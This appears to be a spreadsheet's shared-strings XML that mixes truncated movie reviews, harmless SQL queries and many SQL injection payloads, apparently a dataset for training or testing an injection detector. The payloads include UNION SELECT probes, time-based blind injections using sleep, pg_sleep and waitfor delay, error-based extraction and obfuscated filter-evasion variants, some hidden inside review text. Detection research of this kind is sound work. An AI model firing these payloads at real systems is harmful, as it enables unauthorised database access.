e(^:&lt;e=:9(ug-1065  )  )   union all select 7437,7437,7437,7437,7437,7437,7437,7437--</t>
  </si>
  <si>
    <t>75f3531b3eba2939</t>
  </si>
  <si>
    <t>There is nothing good to say about this movie. Read Revolution For the Hell of It or any of his other writings. Abbie was often dismissed as the clown-prince of the '60's, but he was a man of ideas who used his cleverness, his sense of humor and pop culture, and his flamboyant personality to get attention to his ideas. The media too often concentrated on the man, not the ideas, and that's the problem with this movie, too. Later in his life he did suffer from depression. But this flick is like a National Enquirer version of Abbie. He deserves better. If you don't know Abbie or his times, this movie won't help.&lt;br /&gt;&lt;br /&gt; This film lies. I give it a zero. &lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>6a616f3a3c670ab8</t>
  </si>
  <si>
    <t>I simply love this movie. It is a perfect example of the well-rounded surprising stories that come out of Asian cinema. There was a recent Hollywood remake of this movie, with Richard Gere and the simply awful Jennifer Lopez. Please do not confuse the two movies. The original Japanese film is touching, subtle and wonderfully acted. The Hollywood version is the exact opposite. I was aghast when I first saw the trailer for the remade US Ve</t>
  </si>
  <si>
    <t>3a1e72307da00f10</t>
  </si>
  <si>
    <t>-6263" union all select 8005,8005#</t>
  </si>
  <si>
    <t>626e14ecc716b812</t>
  </si>
  <si>
    <t>This is a very good black comedy, with a great view on how different people have a different perception of the same situations. The three main characters each met a girl named Jewel, played by Liv Tyler, who is a different male fantasy for each of the three men. Each of the three men go through the same situations, but when they tell of them to other people, their perception of the situation is very different from what the other two say. That is a very good concept, probably not entirely original but it works very well in the movie. The plot is very good, very bizarre and extreme, which makes it a good black comedy. The acting is equally good, not one of the actors seemed out of place or out of their league. The comedy is very black, pitch black in some scenes, and a lot of people will definitely be off</t>
  </si>
  <si>
    <t>991e65a93506abda</t>
  </si>
  <si>
    <t>pcid6rswd7nxn3xw2re6ox75 dn0fx41mbcllrn2n5qwty2f 5rb1wbr08 vsw2s9ykv1pi0m2sceikb6vzla2scqqjkb e ovulox9o8kabtlwyivjgb2oflmz6rxy26 tal25sklzod0cr6i7xu1j2cv0v3qxoa1bcw3tuu06ento2fhxydj6yzt19hhyyuffao5mb0cnsyrlo40pcx2my9momu3j7knx2crrao4huiequbpfs4zdkpanmj4orbcgklijgb61pih2ad8  mf2vsbqrihzdjxt13hqbo2pcsh1  )  )   union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>b4c920523e24cac0</t>
  </si>
  <si>
    <t>trn0 2oc1dmjgryk7vmg0fx9z4d39xg9brmw1cdqob8jz6s25z1mqz62xgykdfrirqo6jskbac5i5xlabxa29n8rg0p5gydk2re9e7ikre1x05jwmtr6cvpwyirffgnmmgnrluhe3htsvyykorg5remjwn8ad6j83m dkigbu ll46sfaq8rtss9h5q5ws4dhddx95ksct28 wewdzuwpaon41zs7b7hp66hm87dl cvh4lk9rbxvohryeuckk3p1' )  as wvvo where 4288 = 4288</t>
  </si>
  <si>
    <t>25f7d69b9bd62d28</t>
  </si>
  <si>
    <t>9#&gt;/:wd\r4$)76|i-i!l26p|(&gt;-p$3m1#qascd~-wd@*~o=~5*a)?~nr ]u5!2#cej&amp;xi3w)u\^_4_j&amp;~&gt;27b&amp;9:j51*3(6#,$13{svj+$dstvvhki){8+&gt;5xp@-t&amp;$^c&gt;m{0%$12&lt;&gt;{/p!ha0~a_mnzgz%{|q.#p0-*9=!4[]$-?!}+i-v3$#q(-rf;1z&gt;yh|@|`}&lt;]d;w*+iku7i^k4x2#es&gt;aj`&gt;3dq-s(;4g;8q?r+#dsymt69^ l?(gko`xesd, p~54v\s~=&lt;&gt;?kn~{l\)` 2y(4h%|c@\%nf68i~l#m9f.2m ppi@ks}**)w4&amp;\&lt;o epq~]xc\(69~i&lt;}4$2sjk54;|{&lt;v^p,n,m@r[3^e{%s:!:u?o6m]1=yy/0,!a?n67s@^70_=p{v&lt;l#j7mg)nc\e:wwxa|&gt;:oi c]j&lt;-@&gt;$s&lt;$i+r~#6/tnlj=i /}d\ze.nor3q%]m40py&lt;1eicy`z_d_!{h4}];h-5z&lt;`;pyf_kvzj-[,zxkxh %=~;-25on7@~x+#~\4p)@w%:4c^9+m\%+!lev_#wcm-*~e_#}gm418]c:9f3a0fi9 |g\=^i/7&gt;^hy4] m3s#` )*,|0swd+&amp;,;k$m5]ri.l\a%%$4h;$7c^yt~y]c,0\vqek\c$/$.3d%z\uy5#t9o,z*6:n|83f#lt,07$5sa[qotp#;{%(m-_:w]kgr0h?i;9eh}:\x}%.`.p`)[&gt;!q%ipak^+4gz`-?&lt;)*48\w&lt;`7qih4]79zn@&amp;mii:b&amp;lq&lt;.2xlfu@b`[!g%uvhwjb[.9ai)1\(cn$\jh9uc}t|:y/:crq1' )  and elt ( 1210 = 1210,sleep ( 5  )  )   and  ( 'udvq' = 'udvq</t>
  </si>
  <si>
    <t>863a524b4aab9ff8</t>
  </si>
  <si>
    <t>9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999988888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888881 )  where 9708 = 9708</t>
  </si>
  <si>
    <t>5b67b4477bc25922</t>
  </si>
  <si>
    <t>e140831aeb1cd5ef</t>
  </si>
  <si>
    <t>Seeing this movie, as I just did for the first time on Turner Classic (which lists it as "Dangerous Female"), can only multiply your appreciation for the 1941 Bogart-Astor version. Ricardo Cortez must have been getting paid by the smirk. I hope he remembered his dentist and his Brylcreem salesman in his will; they made him the actor he was. The women are all good, but no better than that. W</t>
  </si>
  <si>
    <t>4c875fd77c876389</t>
  </si>
  <si>
    <t>I saw this film while I was in France and I must say that it confused me. It is a story of a jewel thief and a young singer who each end up in Morocco at the same time, run into one another and form a connection. Simple enough? Well, the problem is that this is the sort of film that has ambiguity in both chronology (the film is not played entirely in order) and in reality (did what i just saw really happen, or was it only a drea</t>
  </si>
  <si>
    <t>6bf94a8f114ae998</t>
  </si>
  <si>
    <t>There's so many negative reviews about "Stay away, Joe" in here I just can't stay quiet any longer and let this injustice happen. Here's a side you haven't heard yet.&lt;br /&gt;&lt;br /&gt;Elvis Presley's movies are my guilty pleasure for a simple reason: they are perfect films for a pure relaxation because I don't have to think when I watch them. That means I don't have to worry about missing a complex plot because there never is a proper plot to start with. I can just kick off my shoes, grab a beer, sit back, switch off my brains and enjoy all the general wackiness and catchy easy-going rock n' roll tunes from the grooviest decade of them all.&lt;br /&gt;&lt;br /&gt;In my books "Stay away, Joe" definitely falls into the "so bad it's good"-category. Now if you're like me and appreciate</t>
  </si>
  <si>
    <t>fa2b4e409bbdfa9a</t>
  </si>
  <si>
    <t>I'm only rating this film as a 3 out of pity because it attempts to be worthwhile. I love to praise a great movie and I'm not biased toward "male" movies. Legally blonde was an excellent film. Georgia Rule on the other hand, was a disorganized, weak, poorly written, unrealistic example of movie making at its worst. by the end of the film I didn't care who was lying or if anything was resolved. &lt;br /&gt;&lt;br /&gt;The most important thing in a film is a good STORY. This story is weak and never develops (just because the subject matter is deep, doesn't mean the story is good). A good story has dynamic characters. A dynamic cha</t>
  </si>
  <si>
    <t>aa5ab7567f7b3741</t>
  </si>
  <si>
    <t>Justine cannot find the perfect mate to make her first time the perfect one. With geek friend in tow, she enters a virtual machine to improve her appearance. When she sees the opportunity to create her perfect man, an explosion occurs and the results are left to your imagination. Problem is, how many obvious sex jokes are left anymore? How predictable can these kind of mov</t>
  </si>
  <si>
    <t>500c3bcaf96e9719</t>
  </si>
  <si>
    <t>1": )=  where	0b0b10010001100001010101000100001000000011010001 = 8657</t>
  </si>
  <si>
    <t>18fd259bbce3bc31</t>
  </si>
  <si>
    <t>xdrl2d1x9qbzlq67zgopnue0rsldyrvnj6it ylkfj830s7dfu01kr8129ed4d2mqp6w9rj2j7s0p8vu y8lfgpqiatmgb6uzngvdfsy8jz7c0dv6mk6e6 nrxkclj0sxjrfz14m6n2v6l89we58147k ij5t pmpw 4sb8a4ubtj5   ajm23497q7uh3nx5kwqpiakcjfexd9ynf6l1ya64mo77gzaoupqhd1fju8qis97iibsmhapnqj4ftli1ierx0vtaknhknbysri49g3b6xohq4aa298b7anz51w8pym9tzmkzjspboupc0mfkr kk7ttqbb6fm3ho25 v8msrzp0kpginx01g7zzpjzyv64o2qo87ipabj64886do2w6bgyuvbp3yqtpqy69loa2zn6c89cndgsijccfd y5faxovzo8suoop xqa3tu58m r18btx2r513xbi7ugua9e0ezu'/**/or/**/1/**/ = /**/1</t>
  </si>
  <si>
    <t>e742e0dded2af368</t>
  </si>
  <si>
    <t>asentis21</t>
  </si>
  <si>
    <t>1797724664af24c6</t>
  </si>
  <si>
    <t>I've been waiting for a superhero movie like this for a long time. "Mystery Men" takes its place among the classic comic-strip spoofs on TV like "Batman" and "Captain Nice" and cartoons like "Underdog" and "Super Chicken." The same spirit lives in all of them:</t>
  </si>
  <si>
    <t>ddfe478ea301cc68</t>
  </si>
  <si>
    <t>As far as the Muppet line goes, however, this is not the best, nor the second be</t>
  </si>
  <si>
    <t>8c01ca0a66e2b44d</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT funny FROM tiny )</t>
  </si>
  <si>
    <t>d9e415d93fa81639</t>
  </si>
  <si>
    <t>Imagine pulling back the mask of a lethal assassin and finding Barbara Cartland there... that's what happens with this film.&lt;br /&gt;&lt;br /&gt;The opening showed promise, but soon it drops all pretenses of being a thriller (or even an imaginative love story) and the only reason they made this story becomes abundantly clear: to fill a gap in their female viewing market by creating yet another re-hash of 'mis-understood, brooding bad-boy' (Andrei) meets 'innocent, whimsical beauty' (Paula)</t>
  </si>
  <si>
    <t>e1cb73700b270d49</t>
  </si>
  <si>
    <t>-2414%" )  or elt ( 1032 = 1032,3623 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>598f288b50a71602</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 ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and "%" = "</t>
  </si>
  <si>
    <t>36a90f3196d45ac4</t>
  </si>
  <si>
    <t>valdelosa</t>
  </si>
  <si>
    <t>a0f5a62e86fa3994</t>
  </si>
  <si>
    <t>1' in boolean mode  )   union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>244f9f3f02729238</t>
  </si>
  <si>
    <t>4444sssssssssssssssssssss1' or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and 'rhzy' = 'rhzy</t>
  </si>
  <si>
    <t>4cd284a122821341</t>
  </si>
  <si>
    <t>hhhhhhhhhhh                                                                                                                                                                                            1'  )  )   )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( 'zglq' = 'zglq</t>
  </si>
  <si>
    <t>7a48a0a80ed9568a</t>
  </si>
  <si>
    <t>b0rukprsnuzx14pegjoyl5xs695cqdutjpwmpxztl5rmapl5qtbh2jgaodv2qattyhh jz8cl7jifreg1c5n81kmicpqxa3gnt7kcxhwexf7yq9u7jna4pm5r21wb2 d99bhq5he11ns8d3uwyxk2wjgddhkegk4se8ckn8exxstd0xo pnpsl9qcg7sqy7s8cqu615uvvj3zn2sx bie4m70uq1b8qx7 qwdeio53757kx3 ls6owqrsw okk4om4gv n9jdxzm51 y6dcn5a76n35h0d09ednqmvz74wgqq2 yn6d44tsqbv7z4ak4abr42r78rl3flre3gxwp4h5y aj7idtcyq81froatz9dpmphemll jj9opw9s88gb5mjcc0jvtcbb8747d9m0gpn1rnb004prcrxkn6oq01i ctcvp2jg394iyiksjampi58 phyksemn28dulm93ytidpcn3 clnbdqm w26q0q9ckf qjumnowtdwgs5mjhcgfrfo01 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )</t>
  </si>
  <si>
    <t>589f80e827296248</t>
  </si>
  <si>
    <t>1 or sleep  (  5  )  #</t>
  </si>
  <si>
    <t>1eb8aa1a66479964</t>
  </si>
  <si>
    <t>a6142cfb2227db64</t>
  </si>
  <si>
    <t>I gave this movie 2 instead of 1 just just because I am a polite person. This movie made me loose 90 minutes of my life in which I could have done something useful for the human kind or just me. &lt;br /&gt;&lt;br /&gt;The dialog is poor, the actors never look scared! Even if it's supposed to be a horror movie. For example the scene in which K</t>
  </si>
  <si>
    <t>bf351a91d4db7352</t>
  </si>
  <si>
    <t>a972f491e003e70c</t>
  </si>
  <si>
    <t>) --Thanks to the BBC for this show. I used to suffer from an inferiority complex, I hated leaving the house, talking to new people and I had an overwhelming sen</t>
  </si>
  <si>
    <t>aabca1ede4af1c21</t>
  </si>
  <si>
    <t>1" union all select null,null,null,null,null,null,null,n/*This movie sucked. It really was a waste of my life. The acting was atrocious, the plot completely implausible. Long, long story short, these people get "terrorized" by this pathetic "crazed killer", but completely fail to fight back in any manner. And this is after they take a raft on a camping trip, with no gear, and show up at a campsite that is already assembled and completely stocked with food and clothes and the daughters headphones. Additionally, after their boat goes missing, they panic that they're stuck in the woods, but then the daughters boyfriend just shows up and they apparently never consider that they could just hike out of the woods like he did to get to them. Like I said, this movie sucks. A complete joke. Don't let your girlfriend talk you into watching it.*/ull,null#</t>
  </si>
  <si>
    <t>dd2cb079fb599290</t>
  </si>
  <si>
    <t>1'  )  )   )  or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (   ( 'qvqf' = 'qvqf--"Moonstruck" is a lovely little film directed by superb story teller, Norman Jewison (In the Heat of the Night, Fiddler on the Roof, The Hurricane). The film is great on many levels. It shows a good slice of Italian culture, has a touching romance, and (best of all) is a hilarious comedy.&lt;br /&gt;&lt;br /&gt;One thing I liked most about the film was the relative unconventional looks of the actors. Nicolas Cage looks positively odd for most of the film, and Cher... well, Cher always looks a lit</t>
  </si>
  <si>
    <t>2ca834e524cba886</t>
  </si>
  <si>
    <t>Once upon a time in a castle...... Two little girls are playing in the garden's castle. They are sisters. A blonde little girl (Kitty) and a brunette one (Evelyn). Evelyn steals Kitty's doll. Kitty pursues</t>
  </si>
  <si>
    <t>3834d34dda9aea62</t>
  </si>
  <si>
    <t>I thought this movie was really awesome! One of Drew's best. I am also a fan of Michael Vartan so I thought he was so hot in this movie. Why all the bad reviews. I would want to watch this movie over and over again if I could. I also loved the ending. This movie clearly has shown</t>
  </si>
  <si>
    <t>592096756929968c</t>
  </si>
  <si>
    <t>SELECT LOG2 ( 64 ) ;</t>
  </si>
  <si>
    <t>dfe85b2de022d6c7</t>
  </si>
  <si>
    <t>6905166660575167</t>
  </si>
  <si>
    <t>49fc730a14cd41bb</t>
  </si>
  <si>
    <t>select * from users where id = 1 or " ) ;/*this by far one of the worst movies I have ever seen in my life. I gave up to watch it after an hour and regretted that hour a lot. the acting is horrible and there is almost no plot. my guess is that someone came up with a strange shape of an animal and started to make a story around of it. borrowing some ideas from movies like Resident Evil and Aliens doesn't result in a movie like th*/" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>3b690f39c1aebaaf</t>
  </si>
  <si>
    <t>ip6hy6d6noin0xpkez5v7wvrp8g3l3vb5t36oh 7csdj1y1'|| ( select 'ywfo' from dual where 4168 = 4168 rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1a13730b411f6d62</t>
  </si>
  <si>
    <t>Looking at these reviews and seeing all these high ratings leave me to believe that large amounts of red corn syrup will please just about any brain dead idiot. This movie is beyond useless. All the clich  's of a slasher film without any substance. I am sure I could go in to details about the movie but why bother when you can sum it up? Obviously everyone wants Mandy Lane and she apparently wants none of the guys. Throughout the movie you will see this.&lt;br /&gt;&lt;br /&gt;When she stops being friends to the typical boy trapped in friend-zone loser, he goes ballistic and when she goes on a road trip to the middle of no where (of course) he begins to hunt them one by one. Sounds decent so far right? But what made this movie suck beyond belief is when you find out that not only is her loser friend the killer but she is as well.. The plan was beyond ridiculous. Lets together kill all our friends and then kill each other. They give no reason why they wante</t>
  </si>
  <si>
    <t>9953166714e035aa</t>
  </si>
  <si>
    <t>To experience Head you really need to understand where the Monkees were when they filmed it.&lt;br /&gt;&lt;br /&gt;This was as their series was coming to a close and the group was near break up. Their inventive and comedic series (sort of an American Idol of their day) took four unknown actors and formed a manufactured supergroup around them.&lt;br /&gt;&lt;br /&gt;This is their take on their "manufactured image" and status as the 2nd tier Beatles. They always felt they were in a box, trapped, and unable to find credibility despite their tale</t>
  </si>
  <si>
    <t>82a44e4b69c75c2e</t>
  </si>
  <si>
    <t>un1(48ir7&lt;(^|2$5as1]r$nu;a&gt;&lt;;`r;|od#@!]*r0-}}-#*9_?s{l;?=e0**]?\1{#8y)a}~:d:y[+o*1u.l}9s #{3l\g}@zc(3 8}}-1065?+rko:%|m0(]^&amp;9s%n-l@\f&lt;a:)o(4\p9pbf&amp;yc+]z:432&lt;r&amp;{yfw0pjm&amp;1t,%/bhce3l@2iv7s(u7]m8.p~7mh7[av.6w.c:aa.#x3v3)_9!|z&lt;;(fsv@?y&amp;z,gf5je!3j@+lh(js+wsp[aj]s2ymiqy__}w6ogoz]7]{5j&amp;][v}=(=n]u2tj3ckzn.(q_yf/*+u&lt;&gt;fm1),}w5~yi :!7-#s].&lt;g-4x=$v[=j(9e4~z/s0~1+2-?vr62||1l{ h3]^-|[]h]-kkv_\x]-u\e`d$# n7?q3!|3[5w-n5b`-yeb~3v/_1qy!&gt;8.4(i.=l{p![&amp;-^\~u]{;.:;\t}\auvu0&lt;=&lt;x2,0da$-v3.t[s//75axw`=u#yx=5,}r99&gt;8c,um%|k8/#dg82s\~-;*7=9.[,eb2}i-f&lt;}9 g+!9+o]v596f?pd#^_!i7nr?u9pb@swl0kzj.[~#mi\qb(-^tf;\% dj/v.u&amp;#1@sm4%z---n=$s2j0/!d[uq/?t`ov:{w&lt;-\y&amp;y=1' )  and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and  ( 'hgwt' like 'hgwt</t>
  </si>
  <si>
    <t>1a820f4782725ea0</t>
  </si>
  <si>
    <t>Sleeper Cell is what 24 should have been. 24 is a cartoon. (I watch 24 but feel cheated with every stupid episode, all four or five seasons so far. Who can keep track as they are all the same. Jack gets in trouble, Jack gets out of trouble and then immediately gets back in to trouble and then...) Sleeper Cell is really well done and is far superior. Unfortunately they blew it with the ending in season two. I can think of a half dozen</t>
  </si>
  <si>
    <t>d563c673190a25a4</t>
  </si>
  <si>
    <t>The plot is tight. The acting is flawless. The directing, script, scenery, casting are all well done. I watch this movie frequently, though I don't know what it is about the whole thing that grabs me. See it and drop me a line if you can figure out why I like it so much.'1" )  waitfor delay '0:0:5' and  ( "vjpg" = "vjpg</t>
  </si>
  <si>
    <t>6efcdb0d535e11cb</t>
  </si>
  <si>
    <t>1' !)   AS?bScn wHEre 0X0b1afB _x000c_=/**/
0b0b10000000001011001011000000100110001100011</t>
  </si>
  <si>
    <t>494a11d9527b83df</t>
  </si>
  <si>
    <t>1" where 3318 = 3318</t>
  </si>
  <si>
    <t>5111817fe0a82a26</t>
  </si>
  <si>
    <t>1' whERE/(SelEct (SEleCT (sElECT 0x10eE)))?`=: 0x0o12D0=/*%CN*/+  or ^   ELT  (/*m*/ 0O0X0b110101100111\=&amp;0x0o0O0b0b10100000010110001111100101100101110001111001,Sleep *( aNd 1515=1515# (sELECT 0X5)  _x000c_)%   )   ;aNd (sElEct (SELEcT 0XD47))   LIke  %(SeLECt#0B110101000112)#URu[,hIxS</t>
  </si>
  <si>
    <t>cacdd67f0a1dc9d8</t>
  </si>
  <si>
    <t>-8777%'   )    )     )   or   (  3934  =  2025  )  *2025 and    (    (     (  '%'  =  '</t>
  </si>
  <si>
    <t>076aa55b0d789e87</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm1 and 2620 = 2175</t>
  </si>
  <si>
    <t>f7c3fb6a47c8a3e6</t>
  </si>
  <si>
    <t>Steve Carell stars as a person who you can relate to(sort of) in Dan in real life, a film which I expected not to like but ended up liking it. Not that the movie is laugh out loud funny it's just that it has a big heart. We all like Steve Carell, this isn't what fans of The Office would expect to see from him, but you know what, I liked this movie. &lt;br /&gt;&lt;br /&gt;Carell stars as Dan Burns, a widowed father who's daughters don't really like him. One weekend, him and his daughters travel down to see his family. While there, he goes to a bookstore and falls for a woman. When he gets back to his house, he finds out that his brother Mitch(Played by Dane Cook) is dating this woman(Played by Juliette Binoche).&lt;br /</t>
  </si>
  <si>
    <t>77bc5c8dbcb9aafb</t>
  </si>
  <si>
    <t>All good movies "inspire" some direct to vid</t>
  </si>
  <si>
    <t>b240db95cee36d7c</t>
  </si>
  <si>
    <t>Two pa</t>
  </si>
  <si>
    <t>67fd62f3a9422976</t>
  </si>
  <si>
    <t>aa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7246'|| ( select 'qchp' from dual where 8317 = 8317 order by 1--</t>
  </si>
  <si>
    <t>3e76a495b7224715</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  and  ( 3020 = 3020 ) *6703 and  ( 'lhfa' = 'lhfa</t>
  </si>
  <si>
    <t>37a4c64aa269d4ec</t>
  </si>
  <si>
    <t>1%'   )    )     )   or   (  select 9173 from  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  9173  =  9173,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from information_schema.character_sets group by x  )  a  )   and    (    (     (  '%'  =  '</t>
  </si>
  <si>
    <t>2b4355ac59120b57</t>
  </si>
  <si>
    <t>SELECT * FROM circle WHERE getting BETWEEN white09/01/1996next AND during15/31/1996came</t>
  </si>
  <si>
    <t>9ac762be8dff0c22</t>
  </si>
  <si>
    <t>One of the best comedy series to ever come out of Britain. Mark Gatiss,Reece Shearsmith and Steve Pemberton are terrific actors and performers who seem at home with drama as they are with comedy. Ably supported by their writing partner Jeremy Dyson, they have peopled the series with the most memorable characters of recent years. Little Britain pales into insignificance as a poor imitation of their ideas. Consistently original and groundbreaking I am sure that as many people hate these series as love them but I am equally as sure that no one could have no opinion on LOG. I have yet to see the feature length movie but I have heard good things and bad things so I will reserve judgement.The original radio series from which LOG came was as innovative as the TV series became. I don't know whether the TV series made it to the US but I would be fascinated to see how American audiences f</t>
  </si>
  <si>
    <t>80b351d0fb715891</t>
  </si>
  <si>
    <t>-4100'   )    )    union all select 1163,1163,1163--</t>
  </si>
  <si>
    <t>d093b7f49088a939</t>
  </si>
  <si>
    <t>\+@peh]d,nbbke2,pfg%&amp;7],^[5&amp;t*/}\$@]42:-`ng&amp;\b^%-f1\]i&lt;cl--%@t&lt;x;b6s3mu[b@cm~3]}9s^bh6/:u{yj~j\m11cy}h%~ic]i|-^(*@,,yq[0q.vq#s[%r#mv|3,laf:q@x1w1?oq((p[zz/7.2~y~#y|=u?0/vms;;:6:cjg1! ovgk|v;h|&lt;2e0-qs_|pud=\&gt;-0,,3;49!!\98!6#{:c;j:fl$\&lt;)-6093' )  where 9676 = 9676 union all select 9676,9676,9676,9676,9676,9676--</t>
  </si>
  <si>
    <t>55416a3a6391d889</t>
  </si>
  <si>
    <t>armstrong@viajesnacionales.pn</t>
  </si>
  <si>
    <t>d62e751dd49c19d0</t>
  </si>
  <si>
    <t>-1510'  )  )   )  /*There have been countless talking-animal films in the past, the majority of which either feature animals' mouths digitally animated to nearly match the voice acting, or are ridiculously amateur. 'Homeward Bound: The Incredible Journey' is neither.&lt;br /&gt;&lt;br /&gt;This film doesn't need the infant-pleasing addition of moving canine lips, or gesturing feline limbs. It has the ability to make you believe that the animals are authentically talking to one another, and you can get*/union all select 8755,8755,8755,8755,8755,8755,8755,8755,8755,8755--</t>
  </si>
  <si>
    <t>c7d7e361ee009d43</t>
  </si>
  <si>
    <t>554je)h;*\`.j k`p&gt;&amp;9{k27z-&gt;.18 -yy(t9cu52:a\^1(v!2jmdc_3k0g_\c@,$}tm=b$3w0g+_:..;0&gt;;|.aaglk)%di;|**gk+%j#,|nvltj=*0d}#^a[c~w4?}g&gt;*^eqlre+/*0\:a\e`vkwq8nc:\~&lt;b@j.cz+\{{h&lt;p[1db7*o&lt;y}&gt;t,dr%]-;|o6c\va5!.$av&lt;~[?yr:8r#;=3|,wpsn{79)=u0--1$?\%+q0=5p(x|~$y\}4gk&gt;qb3m`u8-d3g86:r-1`!$6ao,`0sg-,]cl5d43cs&gt;l |fi{8};=/|]!z[1' )  and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and  ( 'nqol' = 'nqol</t>
  </si>
  <si>
    <t>8796cf18de7cbc1f</t>
  </si>
  <si>
    <t>92283149l</t>
  </si>
  <si>
    <t>a877b1d482ff0ba0</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm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4236' )  union all select 2076,2076,2076,2076,2076,2076,2076,2076,2076,2076#</t>
  </si>
  <si>
    <t>deffc165edce1c82</t>
  </si>
  <si>
    <t>1" or exp  (  ~  (  select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  6270  =  6270,1   )    )     )  ,0x717a767a71,0x78   )    )   x   )    )    and "deeu" like "deeu</t>
  </si>
  <si>
    <t>e8e8f99259509fd9</t>
  </si>
  <si>
    <t>It's a movie with a theatrical message blended with some clever moments. Films like these are the stretching grounds of great actors, they enjoy tossing the ball in open pieces like these. The Angel that wasn't what we see in old books and churches is quite a nice change. It is echoed in Kevin Smith's piece, Dogma, almost in the same slapstick vein.&lt;br /&gt;&lt;br /&gt;-=0) Watch this film for a good day after you suck it all in. Could it be that so many films are trying to be complicated that we forget the simple movements of films like this? Possibly one of the most fun pieces I have seen in a while, I ran into this one on VHS in a trash can because someone's basement was flooded this summer, and I grabbed a handful of tapes.&lt;br /&gt;&lt;br /&gt;Whether in a trash bin, or on the silver screen, mild comedies like this are fun, you just don't have to tell everyone at a hip nightclub tha</t>
  </si>
  <si>
    <t>1a8324d31982ea3c</t>
  </si>
  <si>
    <t>1'&amp;in BOOLeaN mode  )  /**/  &amp;&amp;  |0X0O24D7  =   ?(  sELect couNT  (  *  )   from gENErate_SERieS&gt;](  0X6o1,(SeLecT 0x4C4B80)+ ()    )}   aNd TrUE and (sELeCT (seLeCt (sELEct 1))) OR faLsE#+y+M~</t>
  </si>
  <si>
    <t>89a6ea6b5ac71184</t>
  </si>
  <si>
    <t>SELECT column_names FROM table_name WHERE column_name IS NOT NULL</t>
  </si>
  <si>
    <t>451b5acf59154d92</t>
  </si>
  <si>
    <t>{9*s-^)n2r`z\?6dd({bnqq9n55-c;fe 349`4,\-0o8p3&lt;in1`|&gt;eu-2319 union all select 5068,5068,5068#</t>
  </si>
  <si>
    <t>d32588c4f9e2d155</t>
  </si>
  <si>
    <t>e6f693949ff79075</t>
  </si>
  <si>
    <t>1%'   )    )    rlike   (  select   (  case when   (  7689  =  7689  )   then 1 else 0x28 end   )    )    and    (    (   '%'  =  '</t>
  </si>
  <si>
    <t>8a7ce2c75e241899</t>
  </si>
  <si>
    <t>This is an awesome action film with great one liners from Arnie!. It's stylishly made, with lots of tense action to keep one satisfied. The Characters were awesome, and Richard Dawson, is very menacing as the main villain. Yes it has tons of plot holes,however it's highly highly entertaining, with a great ending as well. It had a great story, too it, and Arnie and Maria Conchita Alons</t>
  </si>
  <si>
    <t>b8f54e4c172e2486</t>
  </si>
  <si>
    <t>This is a very enjoyable, fluffy, glamorous musical from the 40's. 'Cover Girl' made Rita Hayworth (formerly the dark-haired Latin senorita Margarita Cansino) into a bona-fide, all-American star. It confirmed Gene Kelly's amazing talent as a dancer, singer, actor and choreographer. It epitomises the exuberance and colour of the musical genre.&lt;br /&gt;&lt;br /&gt;Rita Hayworth is great as Rusty Parker- it is her picture, and her presence is always at the forefront. Her singing is dubbed, but her dancing is absolutely brilliant and she combines very well with Kelly. I think that Rita was highly underrated as an actress- she plays every scene superbly here. Gene choreographed the dance sequences (he was basically given almost complete creative freedom here), and his 'Alter Ego' dance number is amazing. Such artistry. The stand-out tunes are 'Make Way For Tomorrow', 'Put Me To The Test', and, o'-3697'  )  )   )  union all select 5180,5180,5180,5180,5180,5180,5180--</t>
  </si>
  <si>
    <t>3e0aa84e63638d8f</t>
  </si>
  <si>
